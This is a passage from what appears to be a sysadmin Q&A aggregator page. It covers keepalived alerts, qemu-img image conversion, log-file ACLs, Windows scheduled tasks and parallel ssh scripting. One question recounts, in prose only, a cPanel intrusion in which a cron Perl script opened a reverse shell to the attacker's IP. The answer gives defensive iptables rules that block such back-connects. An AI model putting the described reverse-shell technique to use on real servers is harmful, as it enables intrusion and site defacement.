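        FLAG=/var/run/keepalived.planned-switch   # touched by the rotation track_script beforehand

        if [ -f "$FLAG" ]; then
            rm -f "$FLAG"        # planned role swap: no alert
            exit 0
        fi

        # unplanned transition: something actually failed
        echo "keepalived: $NAME went to $STATE on $(hostname) at $(date)" \
            | mail -s "keepalived failover" admin@example.com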

    Read the article

  • How can I generate filesystem images that are usable on many different virtualization systems?

    - by Mark Longair
    I have written a script that generates a root filesystem image (based on Debian Lenny) suitable for User-Mode Linux. (Essentially this script creates a filesystem image, mounts it with a loop device, uses debootstrap to create a Lenny install, sets up a static IP for TUN/TAP networking, adds public keys for login by SSH, and installs a web application.) These filesystem images work pretty well with UML, but it would be nice to be able to generate similar images that people can use on alternative virtualization software, and I'm not familiar with these options at all. In particular, since the idea is to use this image as a standalone server for testing the web application, it's important that the networking works. I wonder if anyone can suggest what would be involved in customizing such root filesystem images so that they could be used with other virtualization software, such as VMware, Xen, or as an Amazon EC2 instance? Two particular concerns are:
        If such systems don't use a raw filesystem image (e.g. they need headers with metadata or are compressed in some particular way), do there exist tools to convert between the different formats?
        I assume that in the filesystem, at least /etc/network/interfaces will have to be customized, but are more involved changes likely to be necessary?
    Many thanks for any suggestions.
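
    On the first concern: for hypervisors that do not take a raw image directly, qemu-img (from the qemu-utils package) converts between most of the common container formats. A sketch; the file names are placeholders:

        qemu-img convert -f raw -O vmdk  root_fs.img root_fs.vmdk    # VMware
        qemu-img convert -f raw -O qcow2 root_fs.img root_fs.qcow2   # KVM/QEMU
        qemu-img convert -f raw -O vpc   root_fs.img root_fs.vhd     # VirtualPC/Hyper-V-style VHD

    Xen can generally use a raw file-backed image as-is, so conversion is mainly a concern for the other targets.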

    Read the article

  • Preventing back connect in Cpanel servers

    - by Fernando
    We run a cPanel server and someone gained access to almost all accounts using the following steps:
        1) Gained access to a user account due to a weak password. Note: this user didn't have shell access.
        2) With this user account, he accessed cPanel and added a cron task. The cron task was a Perl script that connected to his IP, and he was able to send back shell commands.
        3) Having a non-jailed shell, he was able to change the content of most websites on the server, especially for users who set their folders to 777 (unfortunately a common recommendation, and sometimes a requirement, for some PHP software).
    Is there a way to prevent this? We started by disabling cron in the cPanel interface, but this is not enough; I see a lot of other ways a user could run this Perl script. We have a firewall running and blocking uncommon outgoing ports, but he used port 80, and I can't block that port because a lot of processes use it to access things, even cPanel itself.
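
    If per-user outbound filtering is acceptable, the iptables owner match (OUTPUT chain only) can stop an ordinary account from opening new outbound connections even on port 80, while leaving system services alone. A sketch only, with a placeholder UID; note that this will also break legitimate outbound calls made by that account's scripts:

        # established replies are always allowed back out
        iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

        # the ordinary account (placeholder UID 1042) may not open new connections at all
        iptables -A OUTPUT -m owner --uid-owner 1042 -m state --state NEW \
            -j LOG --log-prefix "backconnect: "
        iptables -A OUTPUT -m owner --uid-owner 1042 -m state --state NEW -j DROP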

    Read the article

  • Reading log files from web application

    - by Egorinsk
    Hi! I want to write a small PHP application for monitoring logs on a Debian server, including syslog logs and Apache/PHP messages. The problem here is that the Apache user (www-data) has no access to the /var/log directory. What would be the best way to grant the PHP application access to the logs? Let's assume that log files can be really large, like hundreds of megabytes. I have some ideas:
        Write a shell script that is run via sudo and tails the last 512 KB of a log into a separate file that can be read by the application - that's inefficient, because it forks a new process and the data has to be read twice.
        Add www-data to the adm group (which can read logs) - that's insecure.
        Start a PHP process via cron every minute to read the logs - that's not very good, because it doesn't allow real-time monitoring. Also, this script will be started even when I'm not reading logs, and consume CPU time (the server is in the cloud, and I'll have to pay for it).
        Create a hardlink to all log files with lowered permissions - I guess that won't work, because logrotate can recreate the log files and their inode numbers will change.
        Start a separate nginx/Apache server under a privileged user that can read the logs.
    Maybe someone has a better solution?
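
    A middle ground between adding www-data to adm and a sudo wrapper is a POSIX ACL that grants read access to exactly the files the application needs, with a default ACL on the directory so rotated files inherit it. A sketch, assuming the acl package is installed and the filesystem is mounted with ACL support:

        # read access on the existing files
        setfacl -m u:www-data:r /var/log/syslog /var/log/apache2/*.log
        # traversal on the directory plus a default ACL for newly rotated files
        setfacl -m u:www-data:rx -m d:u:www-data:r /var/log/apache2
        getfacl /var/log/apache2 | head      # verify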

    Read the article

  • Why is "start in" needed for Windows scheduled tasks?

    - by GomoX
    We develop a web application that can be deployed on Windows or Linux. The Linux implementation uses cron, and the Windows one uses scheduled tasks, to run a single PHP script that processes all scheduled tasks for our system. The task is scheduled with schtasks during the install process. This has always worked under both W2003 and W2008. A week ago a customer reported that scheduled tasks were not running; he is running Windows 2008. We checked over and over and finally solved the issue by entering the folder that contains the .vbs script as the "start in" folder for the scheduled task. That said, there is no way to set the "start in..." value from schtasks without using an XML definition of the task. XML definitions don't work on Windows 2003, so I would have to add Windows version detection to the installer, additional testing, etc. (I'd like to avoid this if at all possible). The only atypical thing I noticed about the install is that the system is installed in D:\ as opposed to the default C:\Program Files (x86)\, but I don't see how this would matter. All the paths are absolute in all the scripts. Can anyone suggest a reasonable solution for this?

    Read the article

  • Which scripting language to use to asynchronously ssh into equipment, run several commands, parse the output, and save to a file on my computer?

    - by Fujin
    There are several points I'd like to stress in my question. I'd like to login by asynchronously ssh'ing into our infrastructure equipment. Meaning, I do not want to connect to only one device, do all the tasks I need, disconnect, then connect to the next device. I want to connect to several devices at once in order to make the process as fast as possible. By equipment I mean 'infrastructure equipment' and not servers. I say this because I will not have the luxury of saving files to the device then transferring them to myself with scp or another method. The output of the scripts that are run will have to be saved directly to my computer. The output of the commands that are run will need to be cleaned up and parsed. Also I want the outputs of each device to be combined into one nice and neat file, not a separate file for each device. This will all be done from a linux box, using ssh, into devices that all use linux'ish proprietary OSes. My guess is the answer to my question will either be a Bash, Perl, or Python script but I figured it wouldn't hurt to ask and to hear the reasons why one way is better than another. Thanks everyone. EXTRA CREDIT: With you answer, include links to resources that will help create the script I described in the language that you suggested.

    Read the article
